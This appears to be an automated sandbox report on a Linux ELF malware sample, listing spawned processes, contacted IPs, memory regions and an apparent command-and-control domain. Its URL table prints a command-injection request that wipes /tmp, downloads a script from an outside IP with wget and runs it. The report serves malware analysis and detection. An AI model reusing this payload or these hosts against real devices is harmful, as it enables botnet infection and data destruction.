Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/na.elf
|
/tmp/na.elf
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray
"Notification Area" "Area where notification icons appear"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921
statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8
12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9
12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness
of your display"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so
10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925
actions "Action Buttons" "Log out, lock or other system actions"
|
There are 10 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+92.249.48.84/jaws;sh+/tmp/jaws
|
115.173.179.104
|
 |
|
|
http://92.249.48.84/bin
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
plutoc2.site
|
104.248.138.112
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
156.207.10.166
|
unknown
|
Egypt
|
|
|
|
206.127.49.175
|
unknown
|
United States
|
||
|
168.185.136.55
|
unknown
|
United States
|
||
|
208.160.70.47
|
unknown
|
United States
|
||
|
41.157.30.64
|
unknown
|
South Africa
|
||
|
40.160.92.128
|
unknown
|
United States
|
||
|
197.112.205.100
|
unknown
|
Algeria
|
||
|
178.184.52.198
|
unknown
|
Russian Federation
|
||
|
41.233.156.23
|
unknown
|
Egypt
|
||
|
210.55.200.87
|
unknown
|
New Zealand
|
||
|
148.176.105.97
|
unknown
|
United Kingdom
|
||
|
178.228.58.230
|
unknown
|
Netherlands
|
||
|
189.65.76.109
|
unknown
|
Brazil
|
||
|
2.163.240.233
|
unknown
|
Germany
|
||
|
206.152.5.185
|
unknown
|
United States
|
||
|
79.136.209.155
|
unknown
|
Russian Federation
|
||
|
94.57.15.167
|
unknown
|
United Arab Emirates
|
||
|
123.31.16.60
|
unknown
|
Viet Nam
|
||
|
156.67.60.38
|
unknown
|
Spain
|
||
|
128.121.51.108
|
unknown
|
United States
|
||
|
197.43.51.157
|
unknown
|
Egypt
|
||
|
191.201.150.51
|
unknown
|
Brazil
|
||
|
41.69.118.212
|
unknown
|
Egypt
|
||
|
213.227.88.188
|
unknown
|
Poland
|
||
|
221.162.29.182
|
unknown
|
Korea Republic of
|
||
|
112.167.94.83
|
unknown
|
Korea Republic of
|
||
|
79.228.253.227
|
unknown
|
Germany
|
||
|
197.130.137.48
|
unknown
|
Morocco
|
||
|
212.86.129.76
|
unknown
|
Germany
|
||
|
139.189.9.53
|
unknown
|
China
|
||
|
210.211.21.129
|
unknown
|
Indonesia
|
||
|
197.164.175.142
|
unknown
|
Egypt
|
||
|
68.52.177.26
|
unknown
|
United States
|
||
|
174.49.111.93
|
unknown
|
United States
|
||
|
148.212.221.191
|
unknown
|
Mexico
|
||
|
172.211.10.39
|
unknown
|
United States
|
||
|
213.22.127.19
|
unknown
|
Portugal
|
||
|
194.54.95.184
|
unknown
|
Germany
|
||
|
197.132.31.221
|
unknown
|
Egypt
|
||
|
66.104.249.172
|
unknown
|
United States
|
||
|
221.92.100.54
|
unknown
|
Japan
|
||
|
156.38.239.160
|
unknown
|
South Africa
|
||
|
135.205.221.71
|
unknown
|
United States
|
||
|
13.165.162.220
|
unknown
|
United States
|
||
|
197.65.82.93
|
unknown
|
South Africa
|
||
|
197.191.9.242
|
unknown
|
Ghana
|
||
|
37.239.89.83
|
unknown
|
Iraq
|
||
|
155.160.14.146
|
unknown
|
Japan
|
||
|
178.212.27.65
|
unknown
|
Poland
|
||
|
143.26.217.165
|
unknown
|
United States
|
||
|
17.196.88.41
|
unknown
|
United States
|
||
|
19.47.30.26
|
unknown
|
United States
|
||
|
47.223.219.138
|
unknown
|
United States
|
||
|
157.82.96.108
|
unknown
|
Japan
|
||
|
213.209.187.32
|
unknown
|
Italy
|
||
|
156.146.251.154
|
unknown
|
United States
|
||
|
2.92.140.42
|
unknown
|
Russian Federation
|
||
|
138.50.237.179
|
unknown
|
United States
|
||
|
197.149.160.120
|
unknown
|
South Africa
|
||
|
41.186.122.44
|
unknown
|
Rwanda
|
||
|
60.224.167.111
|
unknown
|
Australia
|
||
|
158.105.246.36
|
unknown
|
Sweden
|
||
|
122.24.48.66
|
unknown
|
Japan
|
||
|
122.29.156.128
|
unknown
|
Japan
|
||
|
156.175.120.22
|
unknown
|
Egypt
|
||
|
162.69.2.58
|
unknown
|
United States
|
||
|
88.149.14.221
|
unknown
|
Iceland
|
||
|
158.175.6.56
|
unknown
|
United States
|
||
|
145.218.123.123
|
unknown
|
European Union
|
||
|
182.40.182.194
|
unknown
|
China
|
||
|
156.215.116.66
|
unknown
|
Egypt
|
||
|
156.143.83.112
|
unknown
|
United States
|
||
|
163.228.110.185
|
unknown
|
Singapore
|
||
|
41.95.85.4
|
unknown
|
Sudan
|
||
|
155.8.215.58
|
unknown
|
United States
|
||
|
123.112.7.99
|
unknown
|
China
|
||
|
199.77.160.245
|
unknown
|
United States
|
||
|
172.60.124.24
|
unknown
|
United States
|
||
|
197.143.173.223
|
unknown
|
Algeria
|
||
|
197.205.16.169
|
unknown
|
Algeria
|
||
|
41.140.123.139
|
unknown
|
Morocco
|
||
|
107.185.34.153
|
unknown
|
United States
|
||
|
111.195.210.21
|
unknown
|
China
|
||
|
197.26.67.215
|
unknown
|
Tunisia
|
||
|
41.37.180.82
|
unknown
|
Egypt
|
||
|
164.123.213.116
|
unknown
|
United States
|
||
|
195.218.238.78
|
unknown
|
Russian Federation
|
||
|
156.228.141.213
|
unknown
|
Seychelles
|
||
|
94.35.125.238
|
unknown
|
Italy
|
||
|
129.155.201.107
|
unknown
|
United States
|
||
|
95.66.84.204
|
unknown
|
Kuwait
|
||
|
186.193.192.43
|
unknown
|
Brazil
|
||
|
156.3.38.240
|
unknown
|
United States
|
||
|
67.244.212.162
|
unknown
|
United States
|
||
|
156.38.69.216
|
unknown
|
Togo
|
||
|
185.89.96.158
|
unknown
|
unknown
|
||
|
160.18.158.243
|
unknown
|
Japan
|
||
|
85.101.160.243
|
unknown
|
Turkey
|
||
|
197.205.198.197
|
unknown
|
Algeria
|
||
|
119.143.77.176
|
unknown
|
China
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f0e6c016000
|
page execute read
|
|
||
|
7f0e6c016000
|
page execute read
|
|
||
|
7f0ef1541000
|
page read and write
|
|||
|
7f0ef14fc000
|
page read and write
|
|||
|
7f0ef13cb000
|
page read and write
|
|||
|
7ffd1658c000
|
page execute read
|
|||
|
7f0e6c018000
|
page read and write
|
|||
|
564ccea8d000
|
page read and write
|
|||
|
564ccc7be000
|
page execute read
|
|||
|
7f0ef105b000
|
page read and write
|
|||
|
7f0ef0c99000
|
page read and write
|
|||
|
7f0e6c019000
|
page read and write
|
|||
|
7f0ef1080000
|
page read and write
|
|||
|
7f0eec021000
|
page read and write
|
|||
|
7f0ef1541000
|
page read and write
|
|||
|
7f0ef0a0a000
|
page read and write
|
|||
|
7f0ef14f4000
|
page read and write
|
|||
|
564ccc9f8000
|
page read and write
|
|||
|
7f0ef105b000
|
page read and write
|
|||
|
564ccc9f8000
|
page read and write
|
|||
|
564cce9f6000
|
page execute and read and write
|
|||
|
7ffd1651f000
|
page read and write
|
|||
|
7f0eec000000
|
page read and write
|
|||
|
7f0ef09fc000
|
page read and write
|
|||
|
564cd07aa000
|
page read and write
|
|||
|
564ccc9f0000
|
page read and write
|
|||
|
7f0ef0c99000
|
page read and write
|
|||
|
7f0eec021000
|
page read and write
|
|||
|
7f0ef14f4000
|
page read and write
|
|||
|
7f0eec000000
|
page read and write
|
|||
|
564ccc7be000
|
page execute read
|
|||
|
7ffd1651f000
|
page read and write
|
|||
|
7f0ef01f9000
|
page read and write
|
|||
|
7f0ef09fc000
|
page read and write
|
|||
|
564cce9f6000
|
page execute and read and write
|
|||
|
7f0ef1080000
|
page read and write
|
|||
|
7f0ef13cb000
|
page read and write
|
|||
|
564ccc9f0000
|
page read and write
|
|||
|
7f0e6c018000
|
page read and write
|
|||
|
564cd07aa000
|
page read and write
|
|||
|
7f0ef01f9000
|
page read and write
|
|||
|
7f0e6c019000
|
page read and write
|
|||
|
7f0ef0a0a000
|
page read and write
|
|||
|
7ffd1658c000
|
page execute read
|
|||
|
7f0ef14fc000
|
page read and write
|
|||
|
564ccea8d000
|
page read and write
|
There are 36 hidden memdumps, click here to show them.